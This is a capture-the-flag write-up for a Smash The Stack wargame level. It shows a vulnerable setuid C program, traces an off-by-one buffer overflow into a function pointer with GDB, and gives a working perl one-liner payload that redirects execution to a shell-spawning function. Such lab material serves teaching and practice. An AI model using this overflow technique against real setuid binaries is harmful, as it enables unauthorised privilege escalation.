Smash The Stack – Level3


I have made some changes in the code for debugging. But later I came
to know that it was not necessary :/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Target of the function pointer in main(); prints the value it is passed.
   The binary is 32-bit, so an int is wide enough to carry an address. */
int good(int addr) {
    printf("Address of hmm: %p\n", addr);
    return 0;
}

/* The function we want to reach: spawns a shell with the binary's setuid. */
int hmm() {
    execl("/bin/sh", "sh", NULL);
    return 0;
}

extern char **environ;

int main(int argc, char **argv) {

    int i, limit;

    /* Wipe the environment so nothing can be stashed there. */
    for(i = 0; environ[i] != NULL; i++)
        memset(environ[i], 0x00, strlen(environ[i]));

    int (*fptr)(int) = good;

    char buf[32];

    /* limit stays uninitialised if argv[1] is longer than 40 bytes. */
    if(strlen(argv[1]) <= 40) limit = strlen(argv[1]);

    /* '<=' copies limit+1 bytes into a 32-byte buffer: the overflow. */
    for(i = 0; i <= limit; i++) {
        buf[i] = argv[1][i];
        if(i < 36) buf[i] = 0x41;   /* my debugging change: fill with 'A' */
    }

    printf("Buffer: %s", buf);
    int (*hmmptr)(int) = hmm;

    printf("\nCalling good function\n");
    fptr((int)hmmptr);   /* call through the pointer; reconstructed from the output below */

    return 0;
}

This is really a simple challenge.

I just executed the program with a random argument and got the
address of hmm. Keep that in mind 🙂

$ ./level3 AAA
Buffer: AAAA΂�����
Calling good function
Address of hmm: 0x80484e0

Let's get into the code first.
Our intention is to call the hmm function, which spawns a shell with
the binary's setuid privileges. argv[1] is copied into the character
array buf, so there is a chance of an overflow: to overflow it we have
to give length(argv[1]) > 32, which gets us a segfault.
So I gave an argument of length 36. Luckily, on my first try itself
I got a segfault, which means the instruction pointer is overwritten
with the given value. So I turned on GDB for disassembling.
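To make the bug concrete, here is the copy loop from main() next to a bounded replacement. This is an added example, not code from the challenge or the write-up; the function names and the constructed 40-byte argument are mine.

```c
#include <string.h>

#define BUF_SIZE 32   /* char buf[32] in the challenge */

/* The challenge's copy loop, kept as a reference. '<=' makes it write
 * limit+1 bytes and limit may be anything up to 40, so a 32..40 byte
 * argument runs past buf into whatever the compiler placed after it. */
static int copy_arg_unsafe(char *buf, const char *arg) {
    int i, limit = 0;   /* the original leaves limit uninitialised */
    if (strlen(arg) <= 40) limit = strlen(arg);
    for (i = 0; i <= limit; i++)
        buf[i] = arg[i];
    return i;           /* bytes written */
}

/* Bounded replacement: rejects a missing argument or one that does not
 * fit together with its terminator, and never reads beyond buf_size bytes
 * of arg. Returns the length copied, or -1 when the input is rejected. */
static int copy_arg_bounded(char *buf, size_t buf_size, const char *arg) {
    const char *end;
    size_t len;
    if (arg == NULL || buf_size == 0) return -1;
    end = memchr(arg, '\0', buf_size);   /* NUL within the first buf_size bytes? */
    if (end == NULL) return -1;          /* no: at most buf_size-1 chars fit */
    len = (size_t)(end - arg);
    memcpy(buf, arg, len + 1);           /* copies the terminator as well */
    return (int)len;
}

/* Constructed 40-byte argument, the length of the payload in the write-up. */
static const char FORTY[] = "AAAAAAAAAA" "AAAAAAAAAA" "AAAAAAAAAA" "AAAAAAAAAA";

/* Bytes the original loop writes for that argument; a 64-byte scratch
 * buffer absorbs the overrun so the call itself is safe to run. */
int unsafe_bytes_for_40(void) {
    char scratch[64];
    return copy_arg_unsafe(scratch, FORTY);             /* 41, nine past buf */
}

/* The bounded copy with the same argument and a real 32-byte buffer. */
int bounded_result_for_40(void) {
    char buf[BUF_SIZE];
    return copy_arg_bounded(buf, sizeof buf, FORTY);    /* -1: rejected */
}

/* ...and with the three-byte argument from the write-up's first run. */
int bounded_result_for_AAA(void) {
    char buf[BUF_SIZE];
    return copy_arg_bounded(buf, sizeof buf, "AAA");    /* 3 */
}
```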

$ gdb level3
(gdb) set disassembly-flavor intel
(gdb) set print asm-demangle
(gdb) set demangle-style auto
(gdb) disassemble main
Dump of assembler code for function main:
0x08048510 : push ebp
0x08048511 : mov ebp,esp
0x08048513 : push edi
0x08048514 : and esp,0xfffffff0
0x08048668 : call eax
0x0804866a : mov eax,0x0
0x0804866f : mov edi,DWORD PTR [ebp-0x4]
0x08048672 : leave
0x08048673 : ret

Well, I noticed this line in the disassembly:
0x08048668 : call eax
We have full control over eax, and hence we can execute whatever we
want in memory if we know the address of that location.

So we have to build an exploit which overflows buf and then supplies
the address of the hmm function!

(gdb) r $(perl -e 'print "A"x36 . "\xe0\x84\x04\x08"';)
Calling good function
process 5199 is executing new program: /bin/zsh4

Note: You shouldn't try it in GDB. GDB doesn't give you a shell with
the elevated setuid privileges.

